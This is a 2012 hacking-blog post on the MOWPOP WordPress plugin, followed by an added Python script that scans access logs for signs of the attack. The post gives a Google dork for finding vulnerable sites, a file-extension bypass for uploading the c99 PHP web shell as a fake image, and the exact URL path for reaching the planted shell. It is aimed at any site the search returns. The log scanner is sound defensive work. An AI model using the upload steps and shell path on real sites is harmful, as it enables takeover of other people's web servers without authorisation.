Tuesday, April 10, 2012
[MOWPOP] Plugin WP-CONTENT In WordPress Upload Exploitation
Published: 10:01 PM
Author: shwekoyantaw
Google Dork : inurl:mowpop
For the sites the dork search returns, continue on to /wp-content/plugins/mowpop/submit.php.
For example, if the site that comes up is www.target.com/topics/mowpop, go to www.target.com/wp-content/plugins/mowpop/submit.php.
You will see that image upload is allowed. Then change the shell's file type to some image file type.
For example, c99.php%.gif.
The shell you uploaded can then be accessed through the following directory:
wp-content/plugins/mowpop/editor/forms/pictures/User-Uploads/c99.php%5C0.gif
For example, www.target.com/wp-content/plugins/mowpop/editor/forms/pictures/User-Uploads/c99.php%5C0.gif
REF: 1337 Days
Post by ghost area (ghostarea.net)
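A defender-side check for the pattern described above, as an added example that is not part of the original post: it scans web-server access-log lines for POSTs to the plugin's submit.php and for requests under the User-Uploads directory whose decoded file name carries a script extension, a NUL byte or a backslash. The combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Both paths are taken from the post; everything else is an assumption of this example.
SUBMIT_PATH = "/wp-content/plugins/mowpop/submit.php"
UPLOAD_DIR = "/wp-content/plugins/mowpop/editor/forms/pictures/User-Uploads/"

# Request part of a combined-format access-log line: "METHOD target HTTP/x.y" status
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# A server-side script extension followed by anything other than a letter or digit,
# e.g. "x.php.gif" or "x.php%.gif"; "x.phpinfo.gif" and "myphp.gif" do not match.
SCRIPT_EXT_RE = re.compile(r"\.(php\d?|phtml|phar)(?=[^A-Za-z0-9]|$)", re.IGNORECASE)


def classify(line):
    """Return a finding label for one access-log line, or None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    # Drop the query string, then decode %5C, %00 and similar escapes.
    path = unquote(m["target"].split("?", 1)[0])
    if m["method"] == "POST" and path.lower() == SUBMIT_PATH:
        return "upload-form-post"  # review signal: may also be a legitimate upload
    if path.lower().startswith(UPLOAD_DIR.lower()):
        name = path[len(UPLOAD_DIR):]
        if SCRIPT_EXT_RE.search(name) or "\x00" in name or "\\" in name:
            return "script-name-in-uploads"
    return None


def scan(lines):
    """Return (line_number, label) for every flagged line, numbering from 1."""
    hits = []
    for number, line in enumerate(lines, start=1):
        label = classify(line)
        if label:
            hits.append((number, label))
    return hits


# Constructed sample log lines (documentation IP ranges, made-up file names).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Apr/2012:22:01:00 +0000] "GET /topics/mowpop HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Apr/2012:22:01:09 +0000] "POST ' + SUBMIT_PATH + ' HTTP/1.1" 200 312',
    '203.0.113.7 - - [10/Apr/2012:22:01:30 +0000] "GET ' + UPLOAD_DIR + 'sample.php%5C0.gif HTTP/1.1" 200 88',
    '198.51.100.4 - - [10/Apr/2012:22:05:00 +0000] "GET ' + UPLOAD_DIR + 'holiday.gif HTTP/1.1" 200 20480',
]

if __name__ == "__main__":
    for number, label in scan(SAMPLE_LOG):
        print(number, label)
```

A hit in the uploads directory that returned status 200 means the file exists on disk and should be removed and the plugin's upload handler disabled or fixed; the POST label alone only marks a request worth reviewing.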